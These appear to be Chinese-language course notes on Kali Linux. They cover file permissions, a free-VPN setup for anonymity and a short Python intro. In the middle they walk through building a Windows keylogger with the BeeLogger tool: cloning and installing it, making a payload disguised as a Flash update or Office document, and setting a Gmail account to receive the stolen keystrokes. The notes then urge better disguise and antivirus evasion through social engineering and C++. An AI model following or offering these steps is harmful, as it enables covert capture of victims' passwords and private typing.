文件所有权和权限

touch --help

cd Desktop

mkdir Folder

cd Folder

clear

touch Test1 Test2 Test3 Test4

ls

ls -l

用户   用户组权限

chown sec875:kali Test1

chown root:root Test2

clear

ls -l

cd Downloads

cd ..

ls

cd lscript

ls

ls -l

clear

cd ..

cd Desktop

clear

mkdir Bash

cd Bash

clear

echo "Hello World"

echo "linux Rocks" > bash

ls

mv bash bash.sh

ls

ls -l

./bash.sh

chmod +x bash.sh

ls

./bash.sh

nano bash.sh

hello world

clear

cd ..

ls

rm Bash

rm --help

man rm

rm -r Bash

rm -r Folder

chmod 777

免费设置匿名

https://www.vpnbook.com/freevpn

sudo openvpn 复制粘贴文件名字25000

输入账号密码

duckduckgo.com     不会改变DNS信息 check for dns leaks

sudo openvpn 复制粘贴文件名字53

输入账号密码

Windows键盘记录器

脚本 https://github.com/4w4k3/BeeLogger

sudo bash

cd Desktop

git clone URL地址

ls

cd BeeLogger/

ls

./install.sh

选择 win7 python2.7

ls

python bee.py

关闭，打开一个新终端

sudo bash

cd Desktop

cd BeeLogger/

python bee.py

k    flash    word    excel  ppt    pdf   exe

需要Gmail账户，记录器发回信息

1

[email protected]

testpassword

得到flash更新伪装的exe文件所有杀毒引擎都将会发现它。

可通过社会工程学，C++等其他方式把木马做得更完美，更具伪装性。

在c++部分中有极大程度的方式规避检测。以后有机会建议尝试学习C++部分。

这就从web的钓鱼方式到了客户端软件攻防上面了。

通常，每一个初学者都尝试着给自己定位方向，知道与认知的东西更多的时候才是给自己定位方向的时候。

简介和python模块

python

20+30

name = "sec875"

name

exit()

pypi.python.org/pypi

cd Desktop

pip install google

https://hsploit.com/